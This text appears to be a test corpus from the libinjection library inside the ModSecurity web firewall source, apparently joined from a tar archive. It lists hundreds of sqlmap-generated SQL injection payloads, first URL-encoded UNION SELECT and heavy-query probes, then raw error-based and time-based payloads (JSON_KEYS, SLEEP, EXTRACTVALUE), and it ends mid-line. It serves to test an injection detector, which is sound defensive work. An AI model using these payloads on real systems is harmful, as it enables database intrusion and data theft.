-1532%22%20UNION%20ALL%20SELECT%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%2C%206090%00%20AND%20%22mPiX%22%3D%22mPiX -6003%22%20UNION%20ALL%20SELECT%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%00%20AND%20%22Rowp%22%3D%22Rowp -6809%22%20UNION%20ALL%20SELECT%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%2C%205999%00%20AND%20%22Qmfh%22%3D%22Qmfh foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ZRpS%22%3D%22ZRpS foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22yBwR%22%3D%22yBwR foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22tRcC%22%3D%22tRcC foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22loCC%22%3D%22loCC foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22wnTY%22%3D%22wnTY foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22wCIK%22%3D%22wCIK foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22SHkf%22%3D%22SHkf foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22Mavu%22%3D%22Mavu foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ynhU%22%3D%22ynhU foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22RkIg%22%3D%22RkIg -3188%22%20UNION%20ALL%20SELECT%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%00%20AND%20%22jtQc%22%3D%22jtQc -4363%22%20UNION%20ALL%20SELECT%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%00%20AND%20%22VeGw%22%3D%22VeGw -9348%22%20UNION%20ALL%20SELECT%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%00%20AND%20%22GjUG%22%3D%22GjUG -2368%22%20UNION%20ALL%20SELECT%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%00%20AND%20%22YbVO%22%3D%22YbVO -6750%22%20UNION%20ALL%20SELECT%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%00%20AND%20%22mMHL%22%3D%22mMHL -3128%22%20UNION%20ALL%20SELECT%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%2C%206823%00%20AND%20%22WMlB%22%3D%22WMlB -1227%22%20UNION%20ALL%20SELECT%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%2C%201867%00%20AND%20%22EYkf%22%3D%22EYkf -7319%22%20UNION%20ALL%20SELECT%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%00%20AND%20%22AWqk%22%3D%22AWqk -3826%22%20UNION%20ALL%20SELECT%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%00%20AND%20%22ppHA%22%3D%22ppHA -9382%22%20UNION%20ALL%20SELECT%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%2C%202366%00%20AND%20%22kbdk%22%3D%22kbdk -3821%22%20OR%206968%3D%28CASE%20WHEN%20%28%2852%2B72%29%3D124%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20ELSE%206968%20END%29%20AND%20%22ulXt%22%3D%22ulXt -6700%22%20OR%209712%3D%28CASE%20WHEN%20%28124%3D%2852%2B72%29%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20ELSE%209712%20END%29%20AND%20%22GgOf%22%3D%22GgOf modsecurity-v3.0.4/others/libinjection/data/sqli-sqlmap-20160724.txt0000644000175000017500000003215313607066311025311 0ustar zimmerlezimmerle# https://github.com/client9/libinjection/issues/109 # 1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) 1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))# YxEq 1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- TscQ 1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) 1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))# cDdL 1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- DIOu 1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))FsPL) 1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(45=28,0,5)))))vxEi) 1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6715=6715,0,5)))))Hfle) 1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6958>6957,0,5)))))sets) 1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ZBav"="ZBav 1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ekgZ" LIKE "ekgZ 1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ikjC 1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "AinJ"="AinJ 1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "ULyg" LIKE "ULyg 1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- qLff 1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("ReEg" LIKE "ReEg 1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("SiLv"="SiLv 1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("QwEf"="QwEf 1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("acRz" LIKE "acRz 1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("RJVy" LIKE "RJVy 1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("rTWb"="rTWb 1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("AWGS" LIKE "AWGS 1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("ObjI"="ObjI 1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("SgCv" LIKE "SgCv 1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("vYkA"="vYkA 1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("TAfM"="TAfM 1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("YVzA" LIKE "YVzA 1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("XwuG"="XwuG 1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("tENF" LIKE "tENF 1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("fLDW" LIKE "fLDW 1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("lEki"="lEki "))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("enRJ" LIKE "enRJ 1"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("zhFB"="zhFB 1%" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "%"=" 1%" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "%"=" 1%") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("%"=" 1%") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("%"=" 1%") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("%"=" 1%")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("%"=" 1%")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("%"=" 1%")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("%"=" 1%"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("%"=" 1%"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("%"=" 1%"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("%"=" 1%' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND '%'=' 1%' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND '%'=' 1%') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('%'=' 1%') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('%'=' 1%') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('%'=' 1%')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('%'=' 1%')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('%'=' 1%')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('%'=' 1%'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('%'=' 1%'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('%'=' 1%'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('%'=' 1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eLVs'='eLVs 1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eVVr' LIKE 'eVVr 1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- OiYW 1' IN BOOLEAN MODE) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)# 1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (2270=3285) THEN 1 ELSE 0x28 END))# 1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (7449=7449) THEN 1 ELSE 0x28 END))# 1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'BiBK' LIKE 'BiBK 1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'PqYc'='PqYc 1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- WaOc 1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('bgJB'='bgJB 1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('nPXQ' LIKE 'nPXQ 1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ahKA 1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('MTGN'='MTGN 1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('UTnW' LIKE 'UTnW 1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- jjec 1') PROCEDURE 